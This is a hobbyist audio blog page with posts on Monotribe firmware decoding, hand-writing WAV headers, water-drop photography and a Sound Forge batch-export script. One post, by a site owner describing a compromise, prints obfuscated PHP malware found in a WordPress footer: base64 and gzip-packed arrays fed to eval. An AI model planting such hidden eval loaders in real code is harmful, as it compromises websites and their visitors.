scripts-code

Reverse Engineering the Korg Monotribe Firmware Upgrade

An excellent post (and useful comments) on the reverse engineering of the Korg Monotribe firmware update which apparently is provided as an audio file.  I’ll definitely be checking back on this regularly to watch Gravitronic’s progress.

GRAVITRONIC: Decoding the Korg Monotribe Firmware Upgrade.

How to turn any file format into a wave

Boing Boing posted a link to this video from YouTube user r2blend. R2blend used Adobe Audition but also suggests using Audacity’s ‘import data as audio’ feature to render an executable file (and presumably other file formats) to a listenable audio format.

This is awesome and I wanted to give it a try but I don’t have Adobe Audition. I do have Audacity but it’s on the Linux boot of my only laptop so using it there doesn’t do me much good on the Windows 7 boot, where I do most if not all of my audio work.

So I decided to come up with a way to create a valid .wav file header for any file format which can be inserted with the use of a hex editor. Here’s how to do it…

.Wav file headers are incredibly straightforward and require very little calculation to generate. There are numerous sources available on the web but I find this single, 7 year old page on Stanford’s site really easy to understand.

Simplifying the info from stanford further in most cases (i won’t delve into the exceptions here) you need a 44 byte string as follows:

52 49 46 46 “RIFF”
6E E8 02 00 the file size minus 8 bytes
57 41 56 45 “WAVE”
66 6D 74 20 “fmt ”
10 00 00 00 16 for PCM.
01 00 PCM = 1
02 00 Number of channels
44 AC 00 00 sample rate (this example is 44100)
10 B1 02 00 sample rate * Num Channels * Bits per sample/8
04 00 NumChannels * BitsPerSample/8
10 00 bits per sample (this example is 16)
64 61 74 61 “data”
00 E8 02 00 Total file size minus 44 bytes

Now that you know what you need we can get started. First make a copy of the file you want to turn into a .wav and change the extension to “.wav”. I used the executable for ESET’s NOD32 64bit anti-virus software.

Right click on the file to determine the file size.

Input the file size information to my handy excel worksheet along with what sample rate you want, how many channels, and the bits per sample. Take note that you can have more than 2 channels…

Open the file you are converting to a working .wav file in your favorite hex editor. I use HxD which is more than sufficient for any of my needs.

Paste the copied 44 byte hex string…

Save it and open it in your favorite audio software and voila! You have audio, where previously there was none.

and as a treat, a look at what happens when you change the channels from one to eight using the same source…

And an example of the audio…
Eset_Nod32_64bit

Hacked! Base 64 Injection.

While it seems WordPress users all over were experiencing the impact of a security flaw months ago I was a little late to the game in realizing my site had been hijacked.  Apologies to anyone who attempted to visit the site and was hit with Google’s Malware warning (if you use chrome) or if you encountered any troubles.  It makes much more sense to me now why I was getting my comment inbox absolotely slaughtered with spam.  Here’s a snippet of some of the code I found in my footer (the original has hundreds of elements in the array):


<? $nam = array(“4_decode”,“base6”);
$cfk = array(“gzunco”,“mpress”) ;
$zippo = array(“eNrFVQ”,“tv2zYQ/iucEUC2W+vhx”,“EETP4Iic7oATR”,
“EszVag6gR”,“KpCKuk”,“ihQtC077H/fnSQ7bpB2”,“6bBhDsQ7frzHR”,
“x5zjBd5pI”,“XMCese”,“iN79AZ2+Voquu53Oy07”,“QfJZf/zoWajB2”,
“cGbBGn5++”,“2vVWsD”,“g4IeDDd+V3Ig0pc6R7Z”,“JuJLOCahGmfEy”,

“dR9BNx+fF”,“NWczM6”,“HMrZ3qM2sPlFnSZVflt”,“rDc7hTrj91/XG”,
“9z07DgC+9”,“3YiNWu”,“SxBN1ib37bsJ/n63er6”,“RSp/DQYwOod17”,
“iIwtqJ61+”,“ug5v52”,“4unjqSDD1jrPBjAqcL0”,“/6gqFrGzlcB72”,
“OxiaO3Ed3”,“fhNP9Y”,“0GNU5JdnU/i6fsdYPSD”,“i23+Wva5/ZnzH”,
“1FjdVqDui”,“daFI+p”,“r0RsrrhcqJwf044H4NP”,“7yF/hnUms=”);
$trimmer = $cfk[0].$cfk[1];
$zipo = array(“eNq9Gm”,“t3mzj2rzg+OTOocRwEi”,“Mc4tP7SH7Cd3f”,
“2SdH2IjWN”,“mMXgBN”,“22T/Pe990riZeymyZzW”,“tYyk+5J0nyLJ2”,
“jhb77Nlle”,“TZIv6a”,“lFVp/F5kq+XvjD3qidF”,“2sTAN9ngeLcyw”,
“yPfZyjAvz”,“Knd+ff”,“jATYDArwmYMkPjVohjL”,“DZOi8M6Nkahub”,
“ce1MNHkvP”,“aYc3K/”,“819WIXMuXlYic+6+oVr”,“l3Htlkcy5/ya+”,
“wSvLZG6Zx”,“+pkbvG”,“XFspc3+We4v/mMnfeC5”,“74lmg2H4qe85e”,
“GT4hTeBHl”,“2mH9ok”,“YEZBWtP7Gw2XX9dzD6w”,“1gbbfzw8ECVRS”,
“Bv8OVdEen”,“/RFKQF”,“mVDXQnprLaibiCp7+Fd”,“W93DMxV4aGz2f”,
“MphtJzEW3”,“2EYw2X”,“c63k6Zebr+UcNd+3qZD”,“4W1ToVLC3XJ1o”,
“uE4dMV4Z+”,“i3vSOi”,“3/OOh3wp6od82Veh3xS”,“m1F43aC/mRSi+”,
“GlL451UWU”,“pvR2U1”,“acLh2wbXV1wqqrB0hDp”,“Hq4bl89kIj0K6”,
“7L+pP0Iko”,“EV8m4B”,“pAVG+3CaCr/bgVB1PyA”,“aQi1IvWWWQh9L”,
“dWhhGKocO”,“a6L6UC”,“ZmvIwSN36q7zgz9m+Kx”,“f5f0f4JZ9vg==”);
$lango = $nam[1].$nam[0];
eval($trimmer($lango(implode(“”, $zippo))));
eval($trimmer($lango(implode(“”, $zipo)))); ?>

<div class=“Footer”>

<a class=“moveToTop” href=“#top”><?php _e(‘top’, ‘Eos’); ?></a>
</div><!– Closes .Footer –>

</div><!– Closes .PageContainer –>

<?php wp_footer(); ?>
</body>
</html>

There was rogue, obfuscated PHP all over the site, I had hundreds upon hundreds of comments awaiting approval all of which were spam, additional adminstrators added, over 2,000 bogus users attempting to register, and to top it off I had this… 777 as my file and folder access levels.

Waterfigures

Flickr user FoToopa just blew my mind.  Their DIY, laser triggered, multi-flash photo set-up for taking hi resolution macro photographs of water droplets is absolutely awesome.  I figured since they use a speaker to control the water droplet output it qualifies as DIY-audio related and deserves posting.  Take a look at the setup:

Waterfigures DIY Setup by FoToopa

FoToopa writes,

Setup for waterfigures. The upper speaker is the dropcontroller. This dropper give a second drop via an audio waveform on the speaker. Control of this timing via a second laser detector just under the dropper. Multiple flashes are used, 5 max for the forground, one for the background. Background can be changed via a colored A3 paper. Different tools can be added, a color injector stay more on the foreground and is controlled via a magnet drive system. This color injector can inject a few paint drops into a falling drop to merge and to form multiple gradiend colors on the splash. On the bottom a second speaker system is used for the waterfigures. Splashes and waterfigures and color injection can be merge together. On the leftside stay a projectiel tool to fire a small iron item through the falling droplet. Ofcourse all this parts are homemade including the hardware controller ( not to seen into this picture). The camera is the D200 nikon driven also by the controller. 2 lasers are used for detection to give the controller the information for all delay’s and timings. All timings are digital at a resolution of 1 to 100 usec at 4 digit/ delay unit. Delays are entred via the keyboard but preset by poweron at the best default time. Some values are drive by 2 rotary encorders to change fast the value.

And then take a look at the results…  Amazing.

Waterfigures by FoToopa

Sound Forge Batch Export Script

I frequently use Sound Forge to edit large wave files into smaller samples and clips that I then use in software samplers, drum machines, or set aside for further editing, When you’re only creating two or three clips, highlighting, copying, pasting, saving, renaming isn’t a big deal. Recently though while working on a project I found myself I need of creating dozens of clips from a single file… and this had to be done for a hundred files.

Sound Forge scripting to the rescue.

Sound Forge comes with some great built in scripts. For the task above I found the script named “Save Regions as Files” particularly useful. At first anyway. The existing script still required me to name the file and select the file location. This is a minor detail but when you have to repeat this process over 100 times it can be extremely frustrating. With a little help from the Sound Forge scripting SDK I came up with the following modification to the original script that will export all regions to the original file’s directory without any prompting.

The example above is named “Test_Wave_Export.wav”. When running the script the 6 regions are automatically saved in the same directory as the source file in incremental format without any additional prompting. A huge time saver.

Test_Wave_Export-01.wav
Test_Wave_Export-02.wav
Test_Wave_Export-03.wav…

Once the script is saved in the Sound Forge Script folder you can make an icon and add the script directly on your toolbar for easy access. This script uses JScript

——————————————————-

import System;
import System.IO;
import System.Windows.Forms;
import SoundForge;

//Run with a file that contains regions
//Iterates through the regions, renders to format of your choice and
//saves the rendered file to the same directory as the source file
//Scan the file for MODIFY HERE to see how to quickly customize for your own use

public class EntryPoint {

public function CleanForFilename(szName)
{
szName = szName.Replace(“:”,”;”);
szName = szName.Replace(“?”,”!”);
szName = szName.Replace(“*”,”+”);
szName = szName.Replace(“/”,”|”);
szName = szName.Replace(“\\”,”|”);
if (szName.IndexOfAny(Path.InvalidPathChars) >= 0)
{
for (var ch in Path.InvalidPathChars)
szName = szName.Replace(ch.ToString(),”_”);
}
return szName;
}

public function Begin(app : IScriptableApp) {

//MODIFY HERE———————————————–
var szType = “.wav”; //choose any valid extension: .avi .wav .w64 .mpg .mp3 .wma .mov .rm .aif .ogg .raw .au .dig .ivc .vox .pca
var vPreset = “DaveTemplate”; //put the name of the template between the quotes, or leave blank to pop the Template chooser.
var FileFullName = app.CurrentFile.Filename; //obtain the full path and filename of the current file
var szDir = FileFullName.substring( 0, FileFullName.lastIndexOf(“\\”) ); //Set the directory to that of the source file.
var file = app.CurrentFile;

if (null == file)
{
app.SetStatusText(“open a file loser!”);
return;
}

//make sure the directory exists
Directory.CreateDirectory(szDir);

var rend : ISfRenderer = null;
if (szType.StartsWith(“.”))
rend = app.FindRenderer(null, szType);
else
rend = app.FindRenderer(szType, null);

if (null == rend)
{
app.SetStatusText(“Renderer not found. Script stopped.”);
DPF(“renderer for {0} not found.”, szType);
return;
}

var template = null;
if (vPreset != “”)
template = rend.GetTemplate(vPreset);
else
template = rend.ChooseTemplate(null, vPreset);
if (null == template)
{
app.SetStatusText(“Template not found. Script stopped.”);
return;
}

var szBase = file.Window.Title;
szBase = szBase.substring(0,szBase.length – 4);

for (var mk in file.Markers)
{
if (mk.Length <= 0)
continue;

var szName = String.Format(“{0}-{1}.{2}”, szBase, mk.Name, rend.Extension);

szName = CleanForFilename(szName);

var szFullName = Path.Combine(szDir, szName);
if (File.Exists(szFullName))
File.Delete(szFullName);

var range : SfAudioSelection = new SfAudioSelection(mk.Start, mk.Length);
file.RenderAs(szFullName, rend.Guid, template, range, RenderOptions(“RenderOnly”));
}

var status : SfStatus = app.WaitForDoneOrCancel();
DPF(“Done -{0}”, status);
}

public function FromSoundForge(app : IScriptableApp) {
ForgeApp = app;
app.SetStatusText(String.Format(“Script ‘{0}’ is running.”, Script.Name));
Begin(app);
app.SetStatusText(String.Format(“Script ‘{0}’ is done.”, Script.Name));
}
public var ForgeApp : IScriptableApp = null;
public function DPF(sz) { ForgeApp.OutputText(sz);}
public function DPF(sz,o) { ForgeApp.OutputText(System.String.Format(sz,o)); }
public function DPF(sz,o,o2) { ForgeApp.OutputText(System.String.Format(sz,o,o2)); }

public function DPF(sz,o,o2,o3) { ForgeApp.OutputText(System.String.Format(sz,o,o2,o3)); }

} // class EntryPoint